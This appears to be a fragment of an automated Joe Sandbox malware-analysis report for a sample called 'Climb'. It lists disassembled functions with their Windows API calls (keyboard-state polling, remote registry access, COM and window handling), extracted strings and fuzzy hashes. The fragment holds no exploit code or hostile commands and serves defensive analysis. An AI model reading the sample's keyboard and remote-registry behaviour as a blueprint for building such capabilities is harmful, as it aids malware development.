                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SendString$_wcslen
                                                                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                      • API String ID: 2420728520-1007645807
                                                                                                                                                                      • Opcode ID: d3f9a192289cdce4ab410542314acc2b32f32c2e6f5ab3d68721d36098386983
                                                                                                                                                                      • Instruction ID: fda4f84b4986479cf52406d66b0753ca41988c7bf4644297b07cc83de5ab72c8
                                                                                                                                                                      • Opcode Fuzzy Hash: d3f9a192289cdce4ab410542314acc2b32f32c2e6f5ab3d68721d36098386983
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E11A371A9016D79E720A366CC5AEFF6E7CFFD6B44F00082B7911E20D1DAA06908C6B5
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 00523007
                                                                                                                                                                        • Part of subcall function 00522D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4), ref: 00522D4E
                                                                                                                                                                        • Part of subcall function 00522D38: GetLastError.KERNEL32(005C1DC4,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4,005C1DC4), ref: 00522D60
                                                                                                                                                                      • _free.LIBCMT ref: 00523013
                                                                                                                                                                      • _free.LIBCMT ref: 0052301E
                                                                                                                                                                      • _free.LIBCMT ref: 00523029
                                                                                                                                                                      • _free.LIBCMT ref: 00523034
                                                                                                                                                                      • _free.LIBCMT ref: 0052303F
                                                                                                                                                                      • _free.LIBCMT ref: 0052304A
                                                                                                                                                                      • _free.LIBCMT ref: 00523055
                                                                                                                                                                      • _free.LIBCMT ref: 00523060
                                                                                                                                                                      • _free.LIBCMT ref: 0052306E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID: &Y
                                                                                                                                                                      • API String ID: 776569668-895024872
                                                                                                                                                                      • Opcode ID: 87444db94ae15c11af52dea9f3edab3a30ac86417c86c3c45bc398b55750156d
                                                                                                                                                                      • Instruction ID: 0f7b93bf14aaaaf34f544617fadd24dfd177ae569e1b76d73050f42b04d036f6
                                                                                                                                                                      • Opcode Fuzzy Hash: 87444db94ae15c11af52dea9f3edab3a30ac86417c86c3c45bc398b55750156d
                                                                                                                                                                      • Instruction Fuzzy Hash: B011A47A140119BFCB05EF94E846CDD3FA5FF46350FC144A5FA089B2A2DA31EA529F90
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 0055A9D9
                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 0055AA44
                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 0055AA64
                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 0055AA7B
                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 0055AAAA
                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 0055AABB
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 0055AAE7
                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 0055AAF5
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 0055AB1E
                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 0055AB2C
                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 0055AB55
                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 0055AB63
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                      • Opcode ID: aa7fe7da45185879015c5dfa35d4fdd8d6957741d0684e42c59d77ff7283dd86
                                                                                                                                                                      • Instruction ID: 849b73dcfa5376c077eaa5ee3979fa949f16772c270e92b8a82dc8986442c1eb
                                                                                                                                                                      • Opcode Fuzzy Hash: aa7fe7da45185879015c5dfa35d4fdd8d6957741d0684e42c59d77ff7283dd86
                                                                                                                                                                      • Instruction Fuzzy Hash: F551F87090479929FB35D7608874BAABFF56F11341F08469BCDC2175C2EA649B4CC7A3
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00556649
                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00556662
                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 005566C0
                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 005566D0
                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 005566E2
                                                                                                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00556736
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00556744
                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00556756
                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00556798
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 005567AB
                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005567C1
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 005567CE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                      • Opcode ID: 86423ae1150154f06c2ab1ba4a2545f836fe66b22b90c3f7637655fb34f233a0
                                                                                                                                                                      • Instruction ID: 74cb6df4b84df6a9f3f61e091a6c33c92ed4303646015cabd2fab8387d179118
                                                                                                                                                                      • Opcode Fuzzy Hash: 86423ae1150154f06c2ab1ba4a2545f836fe66b22b90c3f7637655fb34f233a0
                                                                                                                                                                      • Instruction Fuzzy Hash: 76511F71A00209AFDF18CF69DD95AAEBBB5FB48315F508129F919E7290D7709D04CB60
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F2234: GetWindowLongW.USER32(?,000000EB), ref: 004F2242
                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 004F2152
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 259745315-0
                                                                                                                                                                      • Opcode ID: 619e976193a94a5693c3d621b1498479a9e5373b3f31b9d58640b7b4fa3a3888
                                                                                                                                                                      • Instruction ID: d04bc01a2eadd8905af39332894e2f9db3589e48be10b59ba303046353bfa03c
                                                                                                                                                                      • Opcode Fuzzy Hash: 619e976193a94a5693c3d621b1498479a9e5373b3f31b9d58640b7b4fa3a3888
                                                                                                                                                                      • Instruction Fuzzy Hash: 0141E531100644AFDB205F389D48BBA3BB6BB51334F144256FFA2972E1C7758D42EB29
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 005328D1
                                                                                                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 005328EA
                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005328FA
                                                                                                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00532912
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00532933
                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004F11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00532942
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0053295F
                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004F11F5,00000000,00000000,00000000,000000FF,00000000), ref: 0053296E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 1268354404-3685820393
                                                                                                                                                                      • Opcode ID: da6ccc15786a9223c81ebb358dc8287123726f8117ea8143085ee59562cde013
                                                                                                                                                                      • Instruction ID: 753cd683b215839449d9f1446d7acc520f274652af349f588c775a7803f91e8f
                                                                                                                                                                      • Opcode Fuzzy Hash: da6ccc15786a9223c81ebb358dc8287123726f8117ea8143085ee59562cde013
                                                                                                                                                                      • Instruction Fuzzy Hash: 14518830600709EFDB24DF25CC45FAA7BB5FB98320F104519FA42A62E0D774E881AB54
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                        • Part of subcall function 004F19CD: GetCursorPos.USER32(?), ref: 004F19E1
                                                                                                                                                                        • Part of subcall function 004F19CD: ScreenToClient.USER32(00000000,?), ref: 004F19FE
                                                                                                                                                                        • Part of subcall function 004F19CD: GetAsyncKeyState.USER32(00000001), ref: 004F1A23
                                                                                                                                                                        • Part of subcall function 004F19CD: GetAsyncKeyState.USER32(00000002), ref: 004F1A3D
                                                                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 005895C7
                                                                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 005895CD
                                                                                                                                                                      • ReleaseCapture.USER32 ref: 005895D3
                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0058966E
                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00589681
                                                                                                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0058975B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$(\$(\
                                                                                                                                                                      • API String ID: 1924731296-1472263523
                                                                                                                                                                      • Opcode ID: a41692288560ff877d2519e7e892fa77febee090bb5e1248390faa2c3de11e10
                                                                                                                                                                      • Instruction ID: 21ca604803e32e0040638aa78e43c72546d9de2e447c8221a3840aaaaf6ac6bb
                                                                                                                                                                      • Opcode Fuzzy Hash: a41692288560ff877d2519e7e892fa77febee090bb5e1248390faa2c3de11e10
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C516A70204304AFD704EF11CC5AFBA7BE4FB94714F400A2DF995A62E1DB759948DB92
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00540D31,00000001,0000138C,00000001,00000000,00000001,?,0056EEAE,005C2430), ref: 0055A091
                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00540D31,00000001), ref: 0055A09A
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00540D31,00000001,0000138C,00000001,00000000,00000001,?,0056EEAE,005C2430,?), ref: 0055A0BC
                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00540D31,00000001), ref: 0055A0BF
                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0055A1E0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                      • API String ID: 747408836-2268648507
                                                                                                                                                                      • Opcode ID: 47f6af890524898724e24b85da6868398417576abc7531ca57b6c5f59aef2ed0
                                                                                                                                                                      • Instruction ID: 5556bc82e6bfb565d53228731f398f42e29363644f95c8a21b2a5401e53adf6f
                                                                                                                                                                      • Opcode Fuzzy Hash: 47f6af890524898724e24b85da6868398417576abc7531ca57b6c5f59aef2ed0
                                                                                                                                                                      • Instruction Fuzzy Hash: 4841437180011DAACF04EBE1DD56DFE7B78EF58305F10056ABA01B2092DB356F09CBA5
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A
                                                                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00551093
                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005510AF
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005510CB
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005510F5
                                                                                                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0055111D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00551128
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0055112D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                      • API String ID: 323675364-22481851
                                                                                                                                                                      • Opcode ID: 4c6c75aeb8b1bd9c1a45b36b5b5a89cbcc3b0a245a5889314923504bea71821c
                                                                                                                                                                      • Instruction ID: f16d4839c6f98f825c2b5d7a9557cd6d97114f130be66a1a99f05b453a082328
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c6c75aeb8b1bd9c1a45b36b5b5a89cbcc3b0a245a5889314923504bea71821c
                                                                                                                                                                      • Instruction Fuzzy Hash: D1410B72C1062DABCF11EBA5DC55DFDBBB8FF14754F00406AEA11A61A0EB355E08CBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00584AD9
                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00584AE0
                                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00584AF3
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00584AFB
                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00584B06
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00584B10
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00584B1A
                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00584B30
                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00584B3C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                      • String ID: static
                                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                                      • Opcode ID: 14d0e61bfb830ca3db833853c19296613591108a6c73d6e4d981dec391deb46b
                                                                                                                                                                      • Instruction ID: d1f29d9da4d85e6b5da6ffb272ec03d0d6bb0e9e4cbf5c3432b88a1d43767cfc
                                                                                                                                                                      • Opcode Fuzzy Hash: 14d0e61bfb830ca3db833853c19296613591108a6c73d6e4d981dec391deb46b
                                                                                                                                                                      • Instruction Fuzzy Hash: EA31383210021AABDF11AFA5DC08FEA3FAAFF19765F110215FE15A61E0C735D854EBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005746B9
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005746E7
                                                                                                                                                                      • CoUninitialize.OLE32 ref: 005746F1
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0057478A
                                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 0057480E
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00574932
                                                                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0057496B
                                                                                                                                                                      • CoGetObject.OLE32(?,00000000,00590B64,?), ref: 0057498A
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 0057499D
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00574A21
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00574A35
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 429561992-0
                                                                                                                                                                      • Opcode ID: 7fad64b4ce624d057ee9315d03ab8f2460df2b7fbb5c8e6221149c4736605740
                                                                                                                                                                      • Instruction ID: bcbd98906a9948f3d56625f172904cf787f888bf0093e8f34f1bc5039f8ad923
                                                                                                                                                                      • Opcode Fuzzy Hash: 7fad64b4ce624d057ee9315d03ab8f2460df2b7fbb5c8e6221149c4736605740
                                                                                                                                                                      • Instruction Fuzzy Hash: C8C135B1604305AFD700DF68D88492BBBE9FF89748F10891DF9899B261DB31ED05DB52
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00568538
                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 005685D4
                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 005685E8
                                                                                                                                                                      • CoCreateInstance.OLE32(00590CD4,00000000,00000001,005B7E8C,?), ref: 00568634
                                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 005686B9
                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00568711
                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0056879C
                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 005687BF
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 005687C6
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0056881B
                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00568821
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
